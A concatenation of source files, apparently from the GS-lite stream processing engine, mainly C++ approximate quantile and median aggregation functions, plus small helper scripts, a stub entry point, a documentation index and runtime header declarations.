#include <limits.h>
#include <math.h>
#include "hfta_udaf.h"
#include <algorithm> // std::sort
#include<iostream>
#include "udaf_common.h"
//#define QUANT_LFTA1_SIZE 729
//#define QUANT_LFTA2_SIZE 181
//#define QUANT_LFTA3_SIZE 50
//#define QUANT_EPS 0.01
//#define SKIPDIR_SIZE 100
//#define SKIPDIR_HEIGHT_MAX 7
//#define max(a,b) ((a) > (b) ? (a) : (b))
using namespace std;
// current use
// hfta_only: quant_udaf_hfta0
// extraction: extr_quant_hfta0_fcn extr_med_hfta0_fcn extr_quant_hfta0_space
// lfta/hfta: quant_udaf_lfta3 quant_udaf_hfta3
// TODO
// - Should the hfta part of the hfta/lfta split (hfta3)
// match the hfta-only implementation (hftaZ)?
// - On out-of-space conditions, try a compress before
// discarding the sample. If that happens, can the rate
// of compresses be decreased?
// - Can the lfta part be made to work with actual compression?
// if not, change the implementation to gather a collection
// of samples, then send them up. This should decrease
// lfta space use and reduce the cost of adding to the hfta.
/****************************************************************/
/* Data Structures */
/****************************************************************/
/****************************************************************/
template <class T> struct tuple_t {
T val;
gs_uint32_t gap;
gs_uint32_t del;
gs_uint32_t next;
};
template <class T> struct skipnode_t {
T val;
gs_uint32_t next;
gs_uint32_t down;
};
template <class T> struct skipdir_t {
gs_uint32_t height; // height of tree
gs_uint32_t freeptr; // cursor space stack
gs_uint32_t headptr[SKIPDIR_HEIGHT_MAX]; // ptrs to levels
skipnode_t<T> list[SKIPDIR_SIZE+1];
};
/****************************************************************/
template <class T> struct quant_udaf_lfta3_struct_t {
gs_uint32_t nelts;
gs_uint32_t freeptr;
gs_uint32_t usedptr;
gs_uint32_t circptr;
gs_uint32_t size;
tuple_t<T> t[QUANT_LFTA3_SIZE+1];
skipdir_t<T> sd;
};
template <class T> struct supertuple3_t{ // hfta/lfta
T val;
gs_uint32_t gap;
gs_uint32_t del;
struct supertuple3_t<T> *next;
};
template <class T> struct supertupleZ_t{
T val;
gs_uint32_t gap;
gs_uint32_t del;
gs_int32_t next;
};
template <class T> struct quant_udaf_hfta_struct_t {
gs_uint32_t nelts; // 4 bytes
short int used_head;
short int free_head;
supertupleZ_t<T> *st;
gs_uint32_t *vals;
supertuple3_t<T> *t; // 8 bytes
};
/*************************** Version 3 **************************/
/* Version 3: LFTA-medium */
/****************************************************************/
template <class T> void quant_hfta3_print(quant_udaf_hfta_struct_t<T> *s)
{
supertuple3_t<T> *t;
//printf("In quant_hfta3_print, s=%llx, t=%llx\n",(unsigned long long int)s,(unsigned long long int)(s->t));
gslog(LOG_DEBUG,"HFTA tuples:\n");
for (t=s->t; t != NULL; t=t->next) {
gslog(LOG_DEBUG,"(%u, %u, %u)\n",t->val,t->gap,t->del);
}
}
template <class T> void quant_hfta3_compress(quant_udaf_hfta_struct_t<T> *s)
{
supertuple3_t<T> *t=s->t, *d;
gs_uint32_t threshold;
threshold = (gs_uint32_t)ceil((2.0 * QUANT_EPS) * (float)(s->nelts));
if ((t == NULL) || (t->next == NULL)) return;
d = t->next;
while ((d != NULL) && (d->next != NULL)) {
if (d->gap+d->next->gap+d->next->del < threshold) {
d->next->gap += d->gap;
t->next = d->next;
free(d);
}
t = t->next;
d = t->next;
}
}
/****************************************************************/
/* HFTA3 functions */
/****************************************************************/
// since it does mallocs instead of allocations in a fixed block of memory
template <class T> void quant_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b) {
//printf("sizeof quant_udaf_hfta_struct_t<T> is %lu\n",sizeof(quant_udaf_hfta_struct_t<T>));
//printf("sizeof quant_udaf_lfta3_struct_t<T> is %lu\n",sizeof(quant_udaf_lfta3_struct_t<T>));
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
//printf("quant_udaf_hfta3_HFTA_AGGR_INIT_ size is %lu\n",sizeof(quant_udaf_hfta_struct_t<T>));
s->nelts = 0;
s->t = NULL;
s->vals = NULL;
s->st = NULL;
s->used_head = -1;
s->free_head = -1;
}
void quant_ui_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_uint32_t>(b);
}
void quant_i_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_int32_t>(b);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_uint64_t>(b);
}
void quant_l_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_int64_t>(b);
}
void quant_f_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_float_t>(b);
}
template <class T> void quant_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v) {
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
quant_udaf_lfta3_struct_t<T> *vs = (quant_udaf_lfta3_struct_t<T> *)(v->offset);
supertuple3_t<T> *t=s->t, *tprev=NULL;
tuple_t<T> *u=vs->t;
supertuple3_t<T> *newptr;
gs_uint32_t uptr = vs->usedptr;
gs_uint32_t threshold;
if (uptr == 0) return;
//if (v->length != sizeof(quant_udaf_lfta3_struct_t)) return;
threshold = (gs_uint32_t)ceil((2.0 * QUANT_EPS) * (float)(vs->nelts));
while (uptr != 0) {
//printf("uptr=%d\n",uptr);
if ((u[uptr].next != 0) && (u[uptr].gap+u[u[uptr].next].gap+u[u[uptr].next].del < threshold)) {
u[u[uptr].next].gap += u[uptr].gap;
}
else {
// find position in superstructure
while ((t != NULL) && (t->val <= u[uptr].val)) {
if (t->val == u[uptr].val) {
t->gap += u[uptr].gap;
t->del += u[uptr].del;
uptr = u[uptr].next;
if (!uptr) break;
}
else {
t->del += u[uptr].gap+u[uptr].del-1;
}
tprev = t;
t = t->next;
}
if (!uptr) break;
// create newptr node
newptr = (supertuple3_t<T> *)malloc(sizeof(supertuple3_t<T>));
newptr->val = u[uptr].val;
newptr->gap = u[uptr].gap;
newptr->del = u[uptr].del;
if (t != NULL)
newptr->del += t->gap + t->del - 1;
// merge into superstructure
newptr->next = t;
if (tprev == NULL)
s->t = newptr;
else
tprev->next = newptr;
tprev = newptr;
s->nelts += u[uptr].gap;
}
uptr = u[uptr].next;
}
quant_hfta3_compress<T>(s);
//quant_hfta3_print(s);
//printf("exiting quant_udaf_hfta3_HFTA_AGGR_UPDATE_, s=%llx, t=%llx\n",(unsigned long long int)s,(unsigned long long int)(s->t));
}
void quant_ui_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_uint32_t>(b, v);
}
void quant_i_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_int32_t>(b, v);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_uint64_t>(b, v);
}
void quant_l_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_int64_t>(b, v);
}
void quant_f_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_float_t>(b, v);
}
template <class T> void quant_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
r->length = sizeof(quant_udaf_hfta_struct_t<T>);
r->offset = (gs_p_t )b;
r->reserved = SHALLOW_COPY;
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
//printf("In quant_udaf_hfta3_HFTA_AGGR_OUTPUT_, s=%llx, t=%llx\n\n",(unsigned long long int)s,(unsigned long long int)(s->t));
}
void quant_ui_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_uint32_t>(r, b);
}
void quant_i_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_int32_t>(r, b);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_uint64_t>(r, b);
}
void quant_l_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_int64_t>(r, b);
}
void quant_f_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_float_t>(r, b);
}
template <class T> void quant_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
supertuple3_t<T> *t=s->t, *n;
while(t){
n=t->next;
free(t);
t=n;
}
return;
}
void quant_ui_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_uint32_t>(b);
}
void quant_i_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_int32_t>(b);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_uint64_t>(b);
}
void quant_l_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_int64_t>(b);
}
void quant_f_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_float_t>(b);
}
/****************************************************************/
/* HFTA3 Extraction functions */
/****************************************************************/
template <class T> T extr_quant_hfta3_fcn(vstring *v, gs_float_t phi) {
quant_udaf_hfta_struct_t<T> *vs = (quant_udaf_hfta_struct_t<T> *)(v->offset);
supertuple3_t<T> *t, *p;
gs_uint32_t nelts=0;
gs_int32_t rmin=0, rmax, rank, ropt=INT_MAX;
gs_uint32_t count=0;
for (t=vs->t; t != NULL; t=t->next) {
nelts += t->gap;
count++;
}
rank = (gs_int32_t) (phi*(float)nelts);
for (t=vs->t; t != NULL; t=t->next) {
rmin += t->gap;
rmax = rmin+t->del;
if (max(abs(rmin-rank), abs(rmax-rank)) < ropt) {
p = t;
ropt = max(abs(rmin-rank), abs(rmax-rank));
}
}
return p->val;
}
/*
gs_uint32_t extr_quant_ui_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_uint32_t>(v, phi);
}
gs_int32_t extr_quant_i_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_int32_t>(v, phi);
}
gs_uint64_t extr_quant_ul_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_uint64_t>(v, phi);
}
gs_int64_t extr_quant_l_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_int64_t>(v, phi);
}
gs_float_t extr_quant_f_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_float_t>(v, phi);
}
*/
template <class T> T extr_med_hfta3_fcn(vstring *v)
{
return extr_quant_hfta3_fcn<T>(v, 0.5);
}
gs_uint32_t extr_ui_med_hfta3_fcn(vstring *v){
return extr_med_hfta3_fcn<gs_uint32_t>(v);
}
gs_int32_t extr_i_med_hfta3_fcn(vstring *v){
return extr_med_hfta3_fcn<gs_int32_t>(v);
}
gs_uint64_t extr_ul_med_hfta3_fcn(vstring *v){
return extr_med_hfta3_fcn<gs_uint64_t>(v);
}
gs_int64_t extr_l_med_hfta3_fcn(vstring *v){
return extr_med_hfta3_fcn<gs_int64_t>(v);
}
gs_float_t extr_f_med_hfta3_fcn(vstring *v){
return extr_med_hfta3_fcn<gs_float_t>(v);
}
template <class T> gs_uint32_t extr_quant_hfta3_space(vstring *v)
{
quant_udaf_hfta_struct_t<T> *vs = (quant_udaf_hfta_struct_t<T> *)(v->offset);
supertuple3_t<T> *t;
gs_uint32_t count=0;
for (t=vs->t; t != NULL; t=t->next)
count++;
return count;
}
//////////////////////////////////////////////////////////////////////
// hfta-only code V3
// This approach stores values in a buffer until
// the buffer gets filled, and then puts the values into
// the approximate quantile udaf.
//
// Further, the code is templatized
#define MAX_QUANT_ELEMS 128
#define MAX_VAL_ELEMS 50
// MAX_VAL_ELEMS must be less than MAX_QUANT_ELEMS,
// and probably somewhat less than 1/QUANT_EPS
// Another consideration is space use, as most groups are small,
// so you want MAX_VAL_ELEMS to be as small as possible
// and still capture most small groups.
// To really optimize for space, use a doubling realloc
// strategy until the doubled size would be 2K bytes,
// and then instead of doubling, insert into the approx
// structure.
//
/*
template <class T> struct supertupleZ_t{
T val;
gs_uint32_t gap;
gs_uint32_t del;
gs_int32_t next;
};
*/
/*
template <class T> struct quant_udaf_hftaZ_struct_t{
gs_uint32_t nelts;
short int used_head;
short int free_head;
supertupleZ_t<T> *st;
gs_uint32_t *vals;
};
*/
template <class T> void quant_udaf_hftaZ_compress(quant_udaf_hfta_struct_t<T> *s)
{
int t = s->used_head, d, d_next=-1;
gs_uint32_t threshold;
supertupleZ_t<T> *st = s->st;
threshold = (gs_uint32_t)ceil((2.0 * QUANT_EPS) * (float)(s->nelts));
if ((t == -1) || (st[t].next == -1)) return;
d = st[t].next;
while ((d != -1) && (st[d].next != -1)) {
d_next = st[d].next;
if (st[d].gap + st[d_next].gap + st[d_next].del < threshold) {
st[d_next].gap += st[d].gap;
st[t].next = st[d].next;
st[d].next = s->free_head;
s->free_head = d;
}
t = st[t].next;
d = st[t].next;
}
}
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b) {
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
//printf("quant_udaf_hftaZ_HFTA_AGGR_INIT_ size is %lu\n",sizeof(quant_udaf_hfta_struct_t<T>));
s->nelts = 0;
s->st=NULL;
s->vals = (gs_uint32_t *)malloc(MAX_VAL_ELEMS*sizeof(T));
s->t = NULL;
}
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, T v) {
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
if(s->nelts<MAX_VAL_ELEMS){
s->vals[s->nelts] = v;
s->nelts++;
return;
}
if(s->nelts==MAX_VAL_ELEMS){
// qsort(s->vals, MAX_VAL_ELEMS, sizeof(gs_uint32_t), compare_gs_uint32);
sort(s->vals,s->vals+s->nelts);
s->st = (supertupleZ_t<T> *)malloc(MAX_QUANT_ELEMS*sizeof(quant_udaf_hfta_struct_t<T>));
for(int i=0;i<MAX_VAL_ELEMS;++i){
s->st[i].val = s->vals[i];
s->st[i].gap = 1;
s->st[i].del = 0;
s->st[i].next = i+1;
}
s->st[MAX_VAL_ELEMS-1].next = -1;
for(int i=MAX_VAL_ELEMS; i<MAX_QUANT_ELEMS; ++i){
s->st[i].next = i+1;
}
s->st[MAX_QUANT_ELEMS-1].next = -1;
s->free_head = MAX_VAL_ELEMS;
s->used_head = 0;
free(s->vals);
s->vals = NULL;
}
// s->nelts > MAX_VAL_ELEMS
int t=s->used_head;
int newptr;
gs_uint32_t threshold;
gs_uint32_t val, gap;
gs_uint32_t obj;
supertupleZ_t<T> *st = s->st;
s->nelts++;
// left boundary case
if ((t==-1) || (v <= st[t].val)) {
newptr = s->free_head;
if (newptr==-1) {
gslog(LOG_ALERT, "Out of space in quant_udaf_hftaZ_HFTA_AGGR_UPDATE_.\n");
cout << v << endl;
quant_udaf_hftaZ_compress<T>(s);
return;
}
s->free_head = st[newptr].next;
st[newptr].val = v;
st[newptr].gap = 1;
st[newptr].del = 0;
st[newptr].next = s->used_head;
s->used_head = newptr;
return;
}
// locate position that sandwiches v
int ptr=t;
while ((st[ptr].next!=-1) && (st[st[ptr].next].val < v))
ptr = st[ptr].next;
// right boundary case
if (st[ptr].next==-1) {
// create newptr node
newptr = s->free_head;
if (newptr==-1) {
gslog(LOG_ALERT, "Out of space in quant_udaf_hftaZ_HFTA_AGGR_UPDATE_.\n");
quant_udaf_hftaZ_compress<T>(s);
return;
}
s->free_head = st[newptr].next;
st[newptr].val = v;
st[newptr].gap = 1;
st[newptr].del = 0;
st[newptr].next =-1;
st[ptr].next = newptr;
}
// non-boundary case
else {
int nextptr = st[ptr].next;
obj = st[ptr].gap + st[nextptr].gap + st[nextptr].del;
threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (float)s->nelts);
if (obj <= threshold) {
// insert into existing bucket
st[nextptr].gap++;
}
else {
newptr = s->free_head;
if (newptr==-1) {
gslog(LOG_ALERT, "Out of space in quant_udaf_hftaZ_HFTA_AGGR_UPDATE_.\n");
quant_udaf_hftaZ_compress<T>(s);
return;
}
s->free_head = st[newptr].next;
st[newptr].val = v;
st[newptr].gap = 1;
st[newptr].del = st[nextptr].gap + st[nextptr].del-1;
st[newptr].next = st[ptr].next;
st[ptr].next = newptr;
}
}
if(s->nelts>100 && (s->nelts & 0x03)==0)
quant_udaf_hftaZ_compress<T>(s);
}
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
r->length = sizeof(quant_udaf_hfta_struct_t<T>);
r->offset = (gs_p_t )b;
r->reserved = SHALLOW_COPY;
}
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
if(s->vals != NULL)
free(s->vals);
if(s->st)
free(s->st);
}
template <class T> T extr_quant_hftaZ_fcn(vstring *v, gs_float_t phi) {
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)(v->offset);
int t, p;
if(s->t != NULL){ // separate path for hfta/lfta split
return extr_quant_hfta3_fcn<T>(v, phi);
}
if(s->vals){
// qsort(s->vals, s->nelts, sizeof(gs_uint32_t), compare_gs_uint32);
sort(s->vals,s->vals+s->nelts);
gs_int32_t rank = (gs_int32_t) (phi*(float)(s->nelts));
if(rank>=s->nelts)
rank=s->nelts-1;
return s->vals[rank];
}
gs_int32_t rmin=0, rmax, rank, ropt=INT_MAX;
gs_uint32_t count=0;
supertupleZ_t<T> *st = s->st;
rank = (gs_int32_t) (phi*(float)(s->nelts));
for (t=s->used_head; t != -1; t=st[t].next) {
rmin += st[t].gap;
rmax = rmin+st[t].del;
if (max(abs(rmin-rank), abs(rmax-rank)) < ropt) {
p = t;
ropt = max(abs(rmin-rank), abs(rmax-rank));
} else break;
}
return st[p].val;
}
template <class T> T extr_med_hftaZ_fcn(vstring *v) {
return extr_quant_hftaZ_fcn<T>(v, 0.5);
}
template <class T> int quant_udaf_hftaZ_nelem(gs_sp_t b) {
quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
supertupleZ_t<T> *st = s->st;
if(s->vals != NULL)
return s->nelts;
int ctr=0;
int t=s->used_head;
while(t>=0){
ctr++;
t=st[t].next;
}
return ctr;
}
// Unsigned int
void quant_ui_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_uint32_t>(b);
}
void quant_ui_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v){
quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_uint32_t>(b,v);
}
void quant_ui_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_uint32_t>(r,b);
}
void quant_ui_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_uint32_t>(b);
}
gs_uint32_t extr_quant_ui_hftaZ_fcn(vstring *v, gs_float_t phi) {
return extr_quant_hftaZ_fcn<gs_uint32_t>(v,phi);
}
gs_uint32_t extr_med_ui_hftaZ_fcn(vstring *v){
return extr_med_hftaZ_fcn<gs_uint32_t>(v);
}
int quant_ui_udaf_hftaZ_nelem(gs_sp_t b) {
return quant_udaf_hftaZ_nelem<gs_uint32_t>(b);
}
// int
void quant_i_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_int32_t>(b);
}
void quant_i_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int32_t v){
quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_int32_t>(b,v);
}
void quant_i_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_int32_t>(r,b);
}
void quant_i_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_int32_t>(b);
}
gs_int32_t extr_quant_i_hftaZ_fcn(vstring *v, gs_float_t phi) {
return extr_quant_hftaZ_fcn<gs_int32_t>(v,phi);
}
gs_int32_t extr_med_i_hftaZ_fcn(vstring *v){
return extr_med_hftaZ_fcn<gs_int32_t>(v);
}
gs_int32_t quant_i_udaf_hftaZ_nelem(gs_sp_t b) {
return quant_udaf_hftaZ_nelem<gs_int32_t>(b);
}
// Unsigned long long int
void quant_ul_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_uint64_t>(b);
}
void quant_ul_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint64_t v){
quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_uint64_t>(b,v);
}
void quant_ul_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_uint64_t>(r,b);
}
void quant_ul_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_uint64_t>(b);
}
gs_uint64_t extr_quant_ul_hftaZ_fcn(vstring *v, gs_float_t phi) {
return extr_quant_hftaZ_fcn<gs_uint64_t>(v,phi);
}
gs_uint64_t extr_med_ul_hftaZ_fcn(vstring *v){
return extr_med_hftaZ_fcn<gs_uint64_t>(v);
}
int quant_ul_udaf_hftaZ_nelem(gs_sp_t b) {
return quant_udaf_hftaZ_nelem<gs_uint64_t>(b);
}
// long long int
void quant_l_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_int64_t>(b);
}
void quant_l_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int64_t v){
quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_int64_t>(b,v);
}
void quant_l_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_int64_t>(r,b);
}
void quant_l_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_int64_t>(b);
}
gs_int64_t extr_quant_l_hftaZ_fcn(vstring *v, gs_float_t phi) {
return extr_quant_hftaZ_fcn<gs_int64_t>(v,phi);
}
gs_int64_t extr_med_l_hftaZ_fcn(vstring *v){
return extr_med_hftaZ_fcn<gs_int64_t>(v);
}
int quant_l_udaf_hftaZ_nelem(gs_sp_t b) {
return quant_udaf_hftaZ_nelem<gs_int64_t>(b);
}
// double
void quant_f_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_float_t>(b);
}
void quant_f_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_float_t v){
quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_float_t>(b,v);
}
void quant_f_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_float_t>(r,b);
}
void quant_f_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_float_t>(b);
}
gs_float_t extr_quant_f_hftaZ_fcn(vstring *v, gs_float_t phi) {
return extr_quant_hftaZ_fcn<gs_float_t>(v,phi);
}
gs_float_t extr_med_f_hftaZ_fcn(vstring *v){
return extr_med_hftaZ_fcn<gs_float_t>(v);
}
int quant_f_udaf_hftaZ_nelem(gs_sp_t b) {
return quant_udaf_hftaZ_nelem<gs_float_t>(b);
}
<file_sep>import os
import time
while True:
while os.path.isfile("exampleGdat"):
time.sleep(1)
os.system("cp example.gdat exampleGdatX ; mv exampleGdatX exampleGdat")
time.sleep(1)
<file_sep>
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "errno.h"
#include "gsconfig.h"
#include "gshub.h"
#include "gstypes.h"
#include "lapp.h"
#include "fta.h"
#include "stdio.h"
#include "stdlib.h"
#include "packet.h"
#include "schemaparser.h"
#include "lfta/rts.h"
// --------------------------------------
// This is a stub entry point to ensure that proper linking.
// any actual rts_proto.c should be generated.
// --------------------------------------
// Entry for processing this interface
gs_retval_t main_dproto(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
fprintf(stderr,"ERROR, empty main_dproto called.\n");
exit(1);
}
<file_sep>.. This work is licensed under a Creative Commons Attribution 4.0 International License.
.. SPDX-License-Identifier: CC-BY-4.0
GS-lite Stream Processing Engine
=================================
.. toctree::
:maxdepth: 1
:caption: Documents:
overview.rst
release-notes.rst
* :ref:`search`
<file_sep>#!/bin/sh
./stopit
killall gsprintconsole
killall -9 gsprintconsole
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef __HFTA_RUNTIME_LIBRARY__
#define __HFTA_RUNTIME_LIBRARY__
#include "host_tuple.h"
#include "gsconfig.h"
#include "gstypes.h"
#define string_hash(s) hfta_vstr_hashfunc(s)
#define string_hash_long(s) hfta_vstr_long_hashfunc(s)
#define DNS_SAMPLE_HASH_SZ 50000000
#define DNS_HITLIST_HASH_SZ 50000000
#define DNS_HITLIST_ENTRY_SZ 500000
// Internal functions
void hfta_vstr_init(vstring * str);
gs_retval_t Vstring_Constructor(vstring *, gs_csp_t);
gs_retval_t hfta_vstr_length(vstring *);
void hfta_vstr_assign_with_copy_in_tuple(vstring32 *, const vstring *,
gs_sp_t, int);
void hfta_vstr_assign_with_copy(vstring *, const vstring *);
void hfta_vstr_destroy(vstring *);
void hfta_vstr_replace(vstring *, const vstring *);
gs_uint32_t hfta_vstr_hashfunc(const vstring *);
gs_uint64_t hfta_vstr_long_hashfunc(const vstring *);
gs_retval_t hfta_vstr_compare(const vstring *, const vstring *);
gs_retval_t hfta_vstr_equal(const vstring *, const vstring *);
gs_retval_t hfta_ipv6_compare(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2);
hfta_ipv6_str And_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2);
hfta_ipv6_str Or_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2);
gs_uint32_t hfta_ipv6_hashfunc(const hfta_ipv6_str *s) ;
hfta_ipv6_str hton_ipv6(hfta_ipv6_str s);
hfta_ipv6_str ntoh_ipv6(hfta_ipv6_str s);
gs_retval_t HFTA_Ipv6_Constructor(hfta_ipv6_str *s, gs_csp_t l) ;
// External functions
inline static gs_retval_t str_truncate(vstring * result, vstring *str, gs_uint32_t length) {
result->offset=str->offset;
result->length=(str->length<length)?str->length:length;
result->reserved=SHALLOW_COPY;
return 0;
}
gs_retval_t str_suffix(vstring *result, vstring *s, gs_uint32_t n);
gs_retval_t get_list_entry(vstring *result, vstring *s, vstring *sep, gs_uint32_t pos);
gs_retval_t str_exists_substr(vstring * s1, vstring * s2);
gs_retval_t str_compare(vstring * s1, vstring * s2);
gs_retval_t str_equal(vstring * s1, vstring * s2);
